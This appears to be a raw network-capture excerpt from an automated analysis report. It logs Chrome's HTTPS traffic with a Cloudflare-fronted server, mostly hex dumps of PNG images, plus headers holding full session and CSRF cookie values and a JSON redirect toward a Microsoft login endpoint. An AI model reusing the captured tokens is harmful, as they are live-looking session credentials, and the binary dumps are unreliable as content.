                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1732INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                                              Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              157104.21.0.95443192.168.2.1649837C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1750INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:18 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Powered-By: PHP/8.1.10
                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache, private
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Soq8H4JTjL7ncfcnz82SwTBB18XLeDLx04R19oaK%2FggY15tp9hIN6OX3%2FYNCbe8gxItDFEpDcoP1tv58nabNQs7j8VTVVup14I0xJNjSiZ2z%2F3HvsmkA5sdC7v7s0jQobEKF48nz2NpaUuU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IjVleFgzdkMvS083L1RpKzh3S1o1dVE9PSIsInZhbHVlIjoiak1jM1NsbGNpbHRid3pGamsyT2RUNVdnZDlJa1RPZ2RoendLZHkzZ0RrQjdxUnNBNEU3b0JDbUJxN2hGeGU4ZmRzUFRyMWZRMzFzMlpSVW9NWlJzcG4rRk41bC9IWnR1a0Nqd2VrNkxWbFpBNy9oNEYzdVRIRStLSVplTFUyMEQiLCJtYWMiOiIzZDQwYjQzOTA4NzU2OGQyODI5MGUyMDk4MDhiZjcxMDFkNWRiMjU4ZTJkNWZhYjFlOTkyYzIwYzFjZmQ4YjBlIiwidGFnIjoiIn0%3D; expires=Wed, 25-Oct-2023 18:29:18 GMT; Max-Age=7200; path=/; samesite=lax
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1751INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 68 59 57 44 68 4f 64 6e 70 54 53 6b 35 4b 4d 33 63 77 4b 7a 46 48 55 55 52 34 56 32 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4d 47 6c 70 62 45 70 48 52 6d 56 69 64 44 49 33 4e 6d 31 73 51 30 31 55 57 6b 49 35 53 46 6c 7a 61 47 74 68 65 6b 74 5a 4d 56 4a 51 55 6c 64 59 56 33 4d 35 65 45 52 34 4f 56 6c 74 63 45 77 31 4e 6b 78 73 53 79 39 69 64 33 46 4f 57 6c 70 48 62 6b 78 76 4e 56 63 33 64 46 4a 68 65 6e 52 45 62 7a 59 76 5a 45 68 58 4f 46 4a 61 57 47 31 77 63 44 64 49 53 33 68 42 4f 48 52 6b 64 33 5a 52 55 6d 78 79 63 47 56 32 52 58 70 75 56 7a 64 44 65 47 70 58 55 31 4e 4b 59 7a 46 43 4f 58 4d 35 4e 57 78 46 65 44 56 70 53 6a 6b
                                                                                                                                                                                                                                                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InhYWDhOdnpTSk5KM3cwKzFHUUR4V2c9PSIsInZhbHVlIjoiMGlpbEpHRmVidDI3Nm1sQ01UWkI5SFlzaGthektZMVJQUldYV3M5eER4OVltcEw1NkxsSy9id3FOWlpHbkxvNVc3dFJhenREbzYvZEhXOFJaWG1wcDdIS3hBOHRkd3ZRUmxycGV2RXpuVzdDeGpXU1NKYzFCOXM5NWxFeDVpSjk
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1752INData Raw: 35 62 0d 0a 7b 22 65 78 70 69 72 65 64 22 3a 30 2c 22 72 65 64 69 72 65 63 74 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 5c 2f 63 6f 6d 6d 6f 6e 5c 2f 53 41 53 5c 2f 50 72 6f 63 65 73 73 41 75 74 68 22 7d 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 5b{"expired":0,"redirecturl":"https:\/\/login.microsoftonline.com\/common\/SAS\/ProcessAuth"}
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1752INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              158104.21.0.95443192.168.2.1649865C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1752INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:18 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                              Content-Length: 49602
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 24 Aug 2023 13:40:53 GMT
                                                                                                                                                                                                                                                                                                              ETag: "c1c2-603ab607e0f57"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rr9ZqMvDFYm4Wo4iotkpoOVg4DrouGuCDDE1cW72bblmTs2vKmP1J4IBBRzSo2F%2BtwAWd8MNB2xca9sYArBrxg9NdzdoEHAWavvJE%2BZmR5jibr1Y3qj%2FhwfCn0whkWDnFnalkdqG9s4ScyY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd66d1aa93b02-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1753INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                                                                                                                                                                                                                                                                                                              Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1753INData Raw: b0 25 b0 45 9f b7 9b 01 43 e2 62 65 33 0b 18 4b ba a6 ee e9 53 13 22 43 49 92 24 49 92 24 49 92 24 49 b2 81 a3 6a 56 02 76 06 76 01 76 24 35 6c 0c 0f 4d d4 79 73 49 ab 08 dc 05 dc dd 78 7b 2f 69 db 16 a9 59 eb 92 9a 9f b6 6f d4 b6 a4 6d 84 ba cd 13 a4 eb e9 76 e0 36 e0 3e 52 b3 87 24 49 92 24 49 92 24 49 92 a4 0e b1 81 a3 dc 46 02 7b 92 1a 36 76 21 ad 04 e0 31 7b ad 59 a4 95 39 6e 67 fe 04 f4 53 a1 89 54 46 83 49 cd 1a 3b 03 6f 26 35 41 ad 1c 9a a8 bc 26 01 77 02 b7 02 7f 24 35 4a cd 0e 4d 24 49 92 24 49 92 24 49 92 24 d5 9c cd 00 e5 d2 03 bc 01 d8 b7 51 3b 92 b6 49 51 f3 c6 91 1a 39 6e 05 6e 6c fc 5a dd 65 08 b0 13 b0 1b a9 01 6a 07 60 68 64 a0 0a 7b 01 f8 3d 70 2d 70 3d 6e b9 22 49 92 24 49 92 24 49 92 24 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38
                                                                                                                                                                                                                                                                                                              Data Ascii: %ECbe3KS"CI$I$I$IjVvvv$5lMysIx{/iYomv6>R$I$I$IF{6v!1{Y9ngSTFI;o&5A&w$5JM$I$I$I$Q;IQ9nnlZej`hd{=p-p=n"I$I$I$egG8
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1755INData Raw: eb 89 9f 38 b4 ac 4e d5 f3 c0 e1 40 2f 4b b6 25 70 4b 09 32 5b 56 a7 6a 3a f0 71 24 49 92 24 49 92 24 49 92 24 75 d4 7a c0 3f 88 9f 30 b4 ac 88 ba 07 d8 9e fe 0d 03 4e 21 4d 66 47 e7 b4 ac 88 3a 97 a5 6b 72 92 24 49 92 24 49 92 24 49 92 d4 a6 1d 81 67 89 9f 24 b4 ac c8 9a 4d da 56 65 79 e6 db 0f 18 57 82 6c 96 15 5d bf 22 35 33 49 92 24 49 92 24 49 92 24 49 a5 d2 13 1d 20 a3 77 03 3f 06 86 46 07 91 4a e2 19 e0 cb c0 3b 81 b7 07 67 91 ca e4 7f 81 77 00 13 a2 83 48 92 24 49 92 24 49 92 24 49 f3 d4 a5 81 e3 30 e0 62 60 60 74 10 49 52 25 3c 0e ec d9 78 2b 49 92 24 49 92 24 49 92 24 85 eb 8d 0e 90 c1 d1 c0 25 d8 bc 21 49 5a 7a eb 03 b7 03 5b 45 07 91 24 49 92 24 49 92 24 49 92 a0 fa 0d 1c 67 00 e7 50 9f 95 44 24 49 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49
                                                                                                                                                                                                                                                                                                              Data Ascii: 8N@/K%pK2[Vj:q$I$I$I$uz?0N!MfG:kr$I$I$Ig$MVeyWl]"53I$I$I$I w?FJ;gwH$I$I$I0b``tIR%<x+I$I$I$%!IZz[E$I$I$IgPD$IG` $I$I
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1756INData Raw: ed b6 47 51 92 24 49 92 24 49 92 24 49 0a d2 0b 5c 4f fc a4 5b 54 3d 00 ec d9 f6 28 2a b7 1e d2 aa 02 bf 05 66 13 7f 9e 58 0b d6 d3 c0 09 c0 ca 8b 3a 80 0a 33 14 38 19 98 42 fc 79 12 55 ef 69 7b 14 25 49 92 24 49 92 24 49 92 a4 00 47 10 3f d9 16 51 13 81 a3 80 81 ed 0f a1 0a b6 11 70 2e 6e af 52 86 fa 33 f0 7e 60 d0 62 8f 98 ca 60 2d e0 a7 c4 9f 33 11 35 81 b4 b2 94 24 49 92 24 49 92 24 49 92 54 19 eb 00 93 88 9f 6c eb 74 5d 0b ac 91 61 fc d4 59 cb 93 9a 6e ba 7d 8b 88 4e d7 6c e0 4a dc 26 a5 aa f6 07 c6 13 7f 1e 75 ba 7e 96 63 f0 24 49 92 24 49 92 24 49 92 a4 4e e8 01 ae 23 7e 92 ad 93 f5 32 70 78 e3 73 57 75 f5 02 07 01 0f 11 7f 4e d5 b9 66 03 57 03 af 5f ba c3 a2 12 1b 01 5c 40 fc 39 d5 e9 7a 77 8e c1 93 24 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a
                                                                                                                                                                                                                                                                                                              Data Ascii: GQ$I$I$I\O[T=(*fX:38ByUi{%I$I$IG?Qp.nR3~`b`-35$I$I$ITlt]aYn}NlJ&u~c$I$I$IN#~2pxsWuNfW_\@9zw$I$I$IQ':
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1757INData Raw: e0 49 e2 27 c1 72 d4 fd c0 b0 bc c3 a3 92 db 9a 7a ad 1e d3 ea 04 f2 d1 ed 0e a4 d4 61 6f a3 3e 5b 1e 9d 94 79 6c 24 49 92 24 49 92 24 49 92 d4 a5 de 47 fc e4 57 8e 9a 02 6c 91 79 6c 54 6e 9b 00 cf 11 7f ee 45 d6 e3 c0 1b da 1d 48 29 c8 39 c4 5f 43 39 ea 69 60 50 e6 b1 91 24 49 92 24 49 92 24 49 52 17 ba 83 f8 c9 af 1c f5 99 dc 03 a3 52 5b 03 18 4b fc 79 17 59 d7 00 23 db 1d 48 29 d0 10 e0 1f c4 5f 4b 39 ea e0 cc 63 23 49 92 24 49 92 24 49 92 a4 2e f3 7a e2 27 bd 72 d4 5f 80 01 99 c7 46 e5 b5 12 f0 00 f1 e7 5d 54 cd 01 ce 00 7a db 1d 48 a9 04 de 08 cc 26 fe ba 6a b7 ee c8 3d 30 92 24 49 92 24 49 92 24 49 ea 2e 3f 20 7e d2 ab dd 9a 01 6c 95 7b 60 54 5a cb 92 1a 76 a2 cf bb a8 9a 00 ec d1 f6 28 4a e5 72 3e f1 d7 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24
                                                                                                                                                                                                                                                                                                              Data Ascii: I'rzao>[yl$I$I$IGWlylTnEH)9_C9i`P$I$I$IRR[KyY#H)_K9c#I$I$I.z'r_F]TzH&j=0$I$I$I.? ~l{`TZv(Jr>V6H$I$I$
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1759INData Raw: 6d d2 ea 56 d1 f7 ee 56 6b 16 f0 f6 ec a3 22 2d de 0f 88 3f f7 db a9 1f e4 1f 12 49 65 70 27 f1 5f 60 5a ad 53 f2 0f 87 4a e4 42 e2 cf b1 4e d5 74 e0 5d 79 86 4d ea 0a 43 49 4b 2f 47 5f bb ad d6 c1 f9 87 44 aa 84 1e 60 27 d2 d2 a8 63 89 bf 16 bb b1 fe 46 7a b2 79 e3 25 1c 2b 49 8a d6 4d 3f 0f 5a cd d7 24 e0 36 d2 f7 14 1f 00 d6 44 92 a4 ee d6 03 fc 99 f8 7b 74 bb f5 12 b0 72 e6 b1 91 16 e5 63 c4 9f f3 39 ea 90 dc 03 23 29 d6 68 aa b7 2c d0 bc 9a de c8 af 7a fa 04 f1 e7 58 a7 6a 1a 69 89 73 49 cd f9 1a f1 d7 6f ab 75 79 01 e3 21 95 d9 86 a4 c6 db 47 89 bf fe ac f9 75 1f 70 3c e9 29 2d 49 2a 93 cd 48 4f 60 46 7f 9d b4 aa 55 8f 01 97 00 ff 45 fa de 43 92 a4 6e 72 10 f1 f7 e2 5c 75 46 e6 b1 91 fa 33 84 6a 3f 20 d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa
                                                                                                                                                                                                                                                                                                              Data Ascii: mVVk"-?Iep'_`ZSJBNt]yMCIK/G_D`'cFzy%+IM?Z$6D{trc9#)h,zXjisIouy!Gup<)-I*HO`FUECnr\uF3j? !5qI
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1760INData Raw: 64 88 8c 7e 1b 1d 40 59 6c 4a fd 1b 1b 2e 01 4e 8c 0e 21 75 a1 59 c0 75 d1 21 5a 30 02 d8 3a 3a 84 ba d6 3b 81 87 80 63 81 41 c1 59 54 4f ab 03 57 92 b6 ce 1b 15 9c 45 92 a4 22 8d 26 ad 3e 75 3f b0 7f 70 16 49 92 24 49 52 09 d5 a9 81 e3 19 e0 af d1 21 d4 b6 41 c0 8f 80 61 d1 41 0a f4 7b e0 70 60 6e 74 10 a9 4b 5d 13 1d a0 45 55 5d 1d 4b d5 35 12 f8 31 f0 2b 60 8d e0 2c ea 0e 07 93 26 b4 5c 8d 43 92 54 77 1b 02 57 91 9a cb 37 0d ce 22 49 92 24 49 2a 91 fe 1a 38 d6 01 d6 ee 74 90 0c ae c5 09 f1 3a 38 09 d8 2e 3a 44 81 ee 03 0e 04 66 46 07 91 ba d8 ef 80 d9 d1 21 5a b0 4b 74 00 75 95 fd 49 13 e9 1f 88 0e a2 ae 33 9a b4 1a c7 c5 c0 f0 e0 2c 92 24 15 6d 6f e0 ef c0 59 c0 0a c1 59 24 49 92 24 49 25 d0 5f 03 c7 f6 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29
                                                                                                                                                                                                                                                                                                              Data Ascii: d~@YlJ.N!uYu!Z0::;cAYTOWE"&>u?pI$IR!AaA{p`ntK]EU]K51+`,&\CTwW7"I$I*8t:8.:DfF!ZKtuI3,$moYY$I$I%_OTvC)
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1761INData Raw: 5c 55 bb 67 ab 33 3e 07 9c 11 1d 42 2a 91 f7 03 df 89 0e 21 49 52 87 0d 06 7e 0c 1c 1a 1d 44 92 24 49 92 d4 bc 79 0d 1c ab 00 23 22 83 b4 e0 6f d1 01 b4 d4 be 0e ac 16 1d 22 b3 47 80 8f 46 87 90 94 45 15 1b 38 36 8e 0e a0 d2 39 06 38 33 3a 84 54 42 47 90 56 a6 91 24 a9 9b 0c 00 7e 08 7c 20 3a 88 24 49 92 24 a9 39 f3 1a 38 aa f8 24 ef 3f a2 03 68 a9 6c 07 7c 3c 3a 44 66 53 81 83 80 57 a2 83 48 ca e2 29 60 52 74 88 26 55 f1 be ad e2 1c 0d 7c 2b 3a 84 54 62 a7 03 ef 8a 0e 21 49 52 87 0d 00 2e 05 0e 89 0e 22 49 92 24 49 25 f1 1b 60 6e 1b 75 63 3f ff e6 53 fd fc bd c9 c0 06 4b c8 f2 5e 60 7a 3f 1f 3b be ca 0d 1c 8f 46 07 d0 12 0d 00 ce 6f bc ad 93 a3 70 05 18 a9 6e aa 76 4f d9 30 3a 80 4a e3 10 e0 ec e8 10 52 c9 f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d
                                                                                                                                                                                                                                                                                                              Data Ascii: \Ug3>B*!IR~D$Iy#"o"GFE86983:TBGV$~| :$I$98$?hl|<:DfSWH)`Rt&U|+:Tb!IR."I$I%`nuc?SK^`z?;FopnvO0:JR?"IR.#m
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1763INData Raw: 2f 00 57 90 56 5e 91 a4 48 53 49 cb a8 d6 d5 10 16 7c d1 4a e5 b0 25 f0 4d ea f5 da 8e 24 49 92 24 45 7a 14 f8 0d f0 ae 7e fe ec 1a d2 c3 84 fd 1a 08 2c 57 50 a8 a2 bc 00 cc 88 0e a1 05 9c 4a 7d 26 11 9e 03 3e 13 1d 42 b5 30 1a 38 1c d8 13 58 9f 74 8d 8c 23 3d e1 7d 09 70 4f 54 30 2d 52 d5 1a 38 06 92 5e fc 7e 35 3a 88 0a b1 11 70 5e 74 88 9a 98 02 5c 0d fc 8c d4 b4 51 c5 49 b1 b9 c0 83 8d 3a 9f b4 e4 de de c0 3b 1a b5 72 5c b4 da 18 0c 5c 44 5a f5 64 76 70 16 49 dd ed 24 e0 cc e8 10 1d b0 2c 69 75 a9 91 c0 28 60 0d d2 c3 21 6b 93 b6 12 db 02 57 9c eb b4 23 80 eb 49 df 37 49 92 24 49 92 da 77 26 fd 37 70 2c f1 e7 fe d3 49 2f 0a 57 a5 7c 2a ae 5c b6 25 bd c8 1d 7d 5e e4 aa f7 e5 1d 1e 75 a1 65 80 af 92 26 0c 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9
                                                                                                                                                                                                                                                                                                              Data Ascii: /WV^HSI|J%M$I$Ez~,WPJ}&>B08Xt#=}pOT0-R8^~5:p^t\QI:;r\\DZdvpI$,iu(`!kW#I7I$Iw&7p,I/W|*\%}^ue&w/l
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1764INData Raw: 7a 18 4b da be 72 47 e0 ce d8 28 95 f1 21 e0 0d d1 21 24 49 92 24 a9 5b f4 36 aa 4a aa 36 b9 56 27 bd a4 17 f8 eb e0 2a e0 da e8 10 2a b5 2d 80 5b 81 0b 81 15 3b f4 7f ae 07 1c da a1 ff 4b fd ab da 3d a6 6a f7 70 bd d6 c9 a4 55 7e b4 a0 59 c0 f1 c0 5b 81 c7 83 b3 d4 dd 2c e0 34 d2 6a 1c 0f 05 67 29 a3 8d 81 f7 46 87 90 24 65 77 37 b0 33 e9 e7 af 09 c1 59 ca ae 17 38 3b 3a 84 24 49 92 24 75 8b 5e aa f7 44 d9 ac e8 00 5d ec 3d a4 49 ed aa 9b 0a 7c 36 3a 84 4a 6b 28 69 59 f9 7b 48 2f e8 75 da 09 b8 aa 42 a4 aa 2d a5 6c 03 47 b5 6d 0a 7c 3a 3a 44 09 3d 09 ec 0e 7c 9d ea 5d 93 55 36 06 d8 1e f8 59 74 90 12 3a 11 bf de 4a 52 1d cd 25 6d 95 b9 09 a9 71 5f 8b b6 0b 70 60 74 08 49 92 24 49 ea 06 bd a4 2d 02 a4 25 e9 a1 3e ab 6f 7c 9d b4 6c aa b4 b0 bd 48 13 58 5f
                                                                                                                                                                                                                                                                                                              Data Ascii: zKrG(!!$I$[6J6V'**-[;K=jpU~Y[,4jg)F$ew73Y8;:$I$u^D]=I|6:Jk(iY{H/uB-lGm|::D=|]U6Yt:JR%mq_p`tI$I-%>o|lHX_
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1765INData Raw: b1 9f 86 d4 11 83 99 7f 9d cc bb 66 d6 60 c1 6b 65 24 f3 7f be 59 81 74 dd cc 26 5d 27 90 ae 9b 49 a4 d7 e8 e6 d5 33 c0 58 e0 f1 46 3d 8d df 23 aa 3e 56 25 dd 67 d6 25 5d 37 6b 32 ff 3e 33 af 86 37 fe ee 50 e6 cf 29 4d 02 66 31 ff fa 79 81 05 af 9b 71 a4 fb cb e3 a4 eb 67 5a d1 9f 88 24 55 89 0d 1c ea cf 10 e0 13 d1 21 32 38 8e f4 4d 82 ea 6f 55 e0 2c e0 fd d1 41 0a 32 8c 74 4d 9e 1a 1d a4 0b b8 02 87 8a b0 31 69 b5 82 6e 75 09 70 76 74 08 15 e2 46 d2 f2 e9 ff 13 1d a4 c3 ee 8f 0e 20 56 22 4d 9a 6e d9 a8 ad 80 cd 59 b0 21 a3 59 cb 30 ff c5 c6 a5 dd 7e 6f 3a f0 4f e0 01 60 4c 9f b7 8f b7 91 43 52 35 bc 02 bc 0d b8 93 34 a1 d1 ad 76 06 b6 03 ee 8e 0e d2 25 36 06 76 20 dd f7 b6 02 b6 20 35 2b b6 62 48 a3 60 e9 ee 7b e3 80 7b 49 ab 9d fe 15 f8 0b 69 32 4e 2a
                                                                                                                                                                                                                                                                                                              Data Ascii: f`ke$Yt&]'I3XF=#>V%g%]7k2>37P)Mf1yqgZ$U!28MoU,A2tM1inupvtF V"MnY!Y0~o:O`LCR54v%6v 5+bH`{{Ii2N*
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1767INData Raw: 5e 22 fe 78 75 ba 26 03 df 01 d6 6d 77 10 17 a1 07 f8 3c d5 da be 72 3a a9 f9 cb 55 4a fa b7 0c a9 69 e3 cf c4 1f ab 88 7a 11 f8 6f f2 ae 02 e8 0a 1c f5 b7 03 69 c5 88 57 89 3f 36 9d ae 39 c0 ef 49 0f 80 e6 e4 0a 1c 49 0f 70 24 69 35 c9 e8 cf a1 dd fa 39 e9 fb 76 35 ef 23 a4 07 9c a2 8f 61 b3 35 0b 38 9d 0a be 5e 7d 01 f1 83 d7 4c dd 5d cc 30 88 f4 43 43 f4 f1 6d b7 dc 97 bc 5e 7a 49 4b b1 4e 24 fe dc 2a 4b cd c4 25 dc 8b b2 33 f1 c7 b7 d9 da b4 90 91 50 2e e7 11 7f 8e 74 ba 66 00 5b e7 18 3c 55 d6 ea 54 73 52 e2 21 e0 38 d2 53 9b 2a c6 26 c0 f7 48 2b 4e 44 1f ef 2a d4 9d c0 21 d8 48 b4 38 63 89 3f 4e 45 94 0d 1c d5 b6 2f dd db 9c f6 df 19 c6 af 8e 7a 49 4f 29 fe 81 f8 63 54 86 9a 4e 6a e4 c8 39 71 d2 4b 5a ad 20 fa 73 6b b5 7e 41 39 9f 5c 8d 32 9a b4 ba
                                                                                                                                                                                                                                                                                                              Data Ascii: ^"xu&mw<r:UJizoiW?69IIp$i59v5#a58^}L]0CCm^zIKN$*K%3P.tf[<UTsR!8S*&H+ND*!H8c?NE/zIO)cTNj9qKZ sk~A9\2
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1768INData Raw: 9d da 9a 18 67 03 c3 5b 98 7f 2f e0 48 cf 28 e0 d7 f8 e7 4c dd e3 45 60 8b 16 ff 06 a5 17 70 dc 15 41 e6 a6 c7 33 b4 f6 bd a3 44 7f 41 ff f7 69 62 7c b8 ce 49 6a 4a 37 69 b6 60 af 7a 5e 95 fb a0 fe c0 7e ea 10 1d 9a d1 2e d1 a5 65 75 ac 72 f8 67 58 db 44 d7 9e be c0 41 ea 10 99 59 40 1d a0 4d af a9 03 b8 79 da 53 1d 20 b0 1f 62 bb e5 9c 9b d3 eb c0 ff 05 ba af 77 80 df 03 9b 61 dd e5 be 0b 3c 1f e8 be 4b 35 0a 3b 4b f8 2e bc 1b 9e d2 7c c0 89 c0 c3 58 b7 19 e7 5c 3c 1e c5 3a e5 94 e6 e3 ea 00 01 74 61 bb de 1f 02 f6 c5 37 15 d5 a9 1b 38 0e eb 3a da db 82 f4 50 ec ba 66 2e 72 3e 32 7c 3e e0 e7 c0 0d c0 aa e2 2c 39 da 1d b8 1d 9f db dc ec 83 75 19 3a 08 ff 9c a9 db c2 c0 55 58 21 bc cf 6d cf fa aa 03 04 b0 18 76 2d c9 cd ae 2f d6 69 35 47 2f a8 03 b4 6a 04
                                                                                                                                                                                                                                                                                                              Data Ascii: g[/H(LE`pA3DAib|IjJ7i`z^~.eurgXDAY@MyS bwa<K5;K.|X\<:ta78:Pf.r>2|>,9u:UX!mv-/i5G/j
